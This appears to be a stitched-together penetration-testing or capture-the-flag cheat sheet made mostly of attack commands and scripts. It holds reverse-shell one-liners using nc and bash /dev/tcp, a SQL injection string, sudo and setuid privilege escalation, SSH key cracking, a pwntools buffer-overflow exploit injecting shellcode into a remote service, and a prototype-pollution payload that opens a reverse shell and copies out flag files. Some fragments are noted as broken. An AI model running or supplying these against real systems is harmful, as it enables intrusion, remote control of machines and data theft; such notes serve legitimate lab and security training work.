nmap -sC -A -T4 <ip>
ffuf -u http://<url>/FUZZ -w /usr/share/wordlists/dirb/common.txt
ffuf -u http://<url> -w /usr/share/dnsrecon/subdomains-top1mil.txt -H "Host: FUZZ.<domain>.com" -fc 301
gobuster dir -u http://<url> -w /usr/share/wordlists/dirb/common.txt
nikto -host <ip>
dirb <url> /usr/share/wordlists/dirb/common.txt
pip install git-dumper
git-dumper https://some-url/.git ./meow
ls ./meow
wget -S some://url
import socket
# Minimal raw TCP client: open a stream socket to the hard-coded host on
# port 23 (the next line in the file reads up to 1024 bytes of the reply).
# The socket is never closed in this fragment.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.198.73.23", 23))
print s.recv(1024)
for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done
Listener
nc -nlvp 444
Client
/bin/sh | nc <ip> 444
# or
bash -c "bash -i >& /dev/tcp/127.0.0.1/444 0>&1"
import os
# Hands control to an interactive /bin/bash; os.system blocks until that
# shell exits. Defensive note: any interpreter that can reach os.system is
# equivalent to shell access, so restricting the interpreter alone is not a
# security boundary.
os.system("/bin/bash")
' OR name='test';--
sudo -l
sudo -u theuser <app>
sudo --preserve-env=PATH /some/thing
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
arp -a # arp cache
cat /etc/hosts # look at hosts file
cat /etc/resolv.conf # linux local dns
nmcli dev show #
ipconfig /all # local dns on windows
/usr/share/john/ssh2john.py id_rsa > id_rsa_hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash
Use Ghidra to decompile the binary to C
file some-executable
checksec --file=some-executable
strace ./some-executable
ltrace ./some-executable
gdb some-executable
(gdb) info break
(gdb) info registers
(gdb) disassemble <fn-name>
(gdb) break *0x000055555555539c
(gdb) run
(gdb) stepi
(gdb) continue
# stripped workflow
(gdb) run
(gdb) info file # look for entry point
(gdb) break *0x555555555080
(gdb) run
(gdb) x/1000i $rip # disassemble 1000 instructions starting at the instruction pointer
(gdb) x/1000i 0x5555555558dd # disassemble 1000 instructions starting at an address
(gdb) x/20wx $esp # view 20 words starting from esp
(gdb) delete 1 # delete breakpoint
(gdb) delete # delete all breakpoints
// time_t time(time_t *second) returns epoch in seconds
time_t tVar;
tVar = time((time_t *)0x0); // argument is NULL
void srand(unsigned int seed) // sets a seed for rand() to use
int rand(void)
RBP: bottom of the current stack frame
RAX: 64bit version of EAX(32bit), and AX(16bit)
LEA accepts a standard memory addressing operand, but does nothing more than store the calculated memory offset in the specified register, which may be any general purpose register.
MOV dest_reg, source_reg
MOV eax, 0x0
from pwn import *
def main():
    """Drive the remote service: read a leaked stack address, then send one payload.

    Side effects: opens a network connection to the hard-coded host/port,
    logs at DEBUG level and ends in an interactive session. The offset,
    maximum length and password are specific to the target binary and are
    not derivable from this file.
    """
    context.log_level = 'DEBUG'
    context(os='linux', arch='amd64')
    # io = process('./binary_file')
    io = remote('x.x.x.x', 30774)  # placeholder host kept from the notes
    password = 'w00tw00t'
    return_address_offset = 84  # NOTE(review): binary-specific; confirm against the target
    max_payload_length = 137
    io.sendlineafter('> ', b'1')
    # The last whitespace-separated token of the reply is treated as a hex
    # string: its first two characters are skipped, the rest is rebuilt one
    # byte at a time, left-padded with NUL to 8 bytes and unpacked big-endian.
    # NOTE(review): ''.join(chr(...)) yields a str, not bytes — confirm u64
    # accepts that on the pwntools version in use.
    stack_address = io.recvline().strip().split()[-1]
    stack_address = ''.join([chr(int(stack_address[i:i+2], 16)) for i in range(2, len(stack_address), 2)])
    stack_address = stack_address.rjust(8, '\x00')
    stack_address = u64(stack_address, endian="big")
    log.success(f'Leaked stack address: {p64(stack_address)}')
    io.sendlineafter('> ', b'2')
    io.sendlineafter('password: ', password.encode())
    # Assembled from pwntools' shellcraft templates for the arch set above.
    shellcode = asm(
        shellcraft.popad() +
        shellcraft.sh()
    )
    # Buffer layout: shellcode, filler up to return_address_offset, then the
    # leaked address. The assert is stripped under `python -O`, so it is not
    # a real length guard.
    padding = b'a' * (return_address_offset - len(shellcode))
    payload = shellcode + padding + p64(stack_address)
    assert len(payload) <= max_payload_length, f'Payload too big. "{len(payload)}"'
    io.sendlineafter('commands: ', payload)
    io.sendlineafter('> ', b'3')
    io.interactive()
if __name__ == '__main__':
    main()
from pwn import *
pattern = cyclic(100) # 100 bytes long
offset = cyclic_find('vaaa')
PATH=$PATH:/some/path
ssh -i some_id_rsa <usr>@<ip>
msfconsole
search <name>
use <id>
show options
set rhosts <ip>
set targeturi /cgi-bin/hello.cgi
run
Will serve any file in the directory
python -m SimpleHTTPServer 8000 # if python2
python -m http.server
To fetch from the remote machine
wget http://<ip>:8000/LinEnum.sh
wget -r --level=1 -p http://<website>
find . -name "*" -exec cat {} \; | grep "@email.com" # find strings in downloaded sites
import requests
TARGET_URL = 'http://10.10.12.14:8713'
# Two JSON POSTs whose keys are "__proto__.<field>" — the shape of a
# prototype-pollution payload against a JS backend that merges request
# bodies into objects. Defender's view: request bodies carrying `__proto__`
# (or other prototype-reaching keys) should be rejected or stripped before
# any recursive merge, and logging such keys is a cheap detection.
# NOTE(review): `_content` is a private attribute of requests.Response;
# `.content` is the public equivalent.
r1 = requests.post(TARGET_URL + '/submit', json = {
    "__proto__.type": "Program",
    "__proto__.body": [{
        "type": "MustacheStatement",
        "path": 0,
        "params": [{
            "type": "NumberLiteral",
            "value": "process.mainModule.require('child_process').execSync(`bash -c 'bash -i >& /dev/tcp/10.10.12.14/6666 0>&1'`)"
        }],
        "loc": {
            "start": 0,
            "end": 0
        }
    }]
})
print(r1._content)
# Second request: same key pattern, different polluted field.
r2 = requests.post(TARGET_URL + '/submit', json = {
    "__proto__.block": {
        "type": "Text",
        "line": "process.mainModule.require('child_process').execSync(`cat flag* >> ./static/file.txt`)"
    }
})
print(r2._content)
import socket
f = open("userlist", "r")  # never closed; a `with` block would release it
users = f.readlines()
# Unfinished fragment: for each line of the list it opens a TCP connection
# to port 25 on the mail host and begins an SMTP exchange with "HELO".
# NOTE(review): `socket.AFINTE` is not a socket-module constant, and
# s.send() requires bytes on Python 3 — this does not run as written.
for user in users:
    s = socket.socket(socket.AFINTE)
    s.connect(("mail.baldrinc.com", 25))
    s.recv(1024)
    s.send("HELO")
    #...
# 546d467562334a356558493d
import socket
import time
def exploit(ip, port, x):
    """Send one probe to ip:port and print the reply.

    The probe is x bytes of "A", a fixed 4-byte suffix and a newline.

    Args:
        ip: target host (the caller in this file passes a placeholder).
        port: TCP port.
        x: length of the "A" run that precedes the 4-byte suffix.

    Side effects: one TCP connection per call. The reply is decoded with
    errors ignored, so a binary response prints without raising.
    """
    payload = b"A" * x
    payload += b"\xb3\xba\x37\x13"  # 4-byte suffix; binary-specific, not derivable here
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    time.sleep(0.3)  # short pause before sending; presumably waits for a banner — unverified
    s.sendall(payload + b"\n")
    print(s.recv(2048).decode(errors="ignore"))
    s.close()  # skipped if connect/recv raises; a `with` block would close reliably
# Sweep the "A"-run length from 44 to 79 (36 probes). On the service side
# this appears as a burst of connections each carrying a slightly longer run
# of 0x41 — a pattern worth alerting on in connection or crash logs.
for i in range(44, 80):
    exploit("x.x.x.x", 8080, i)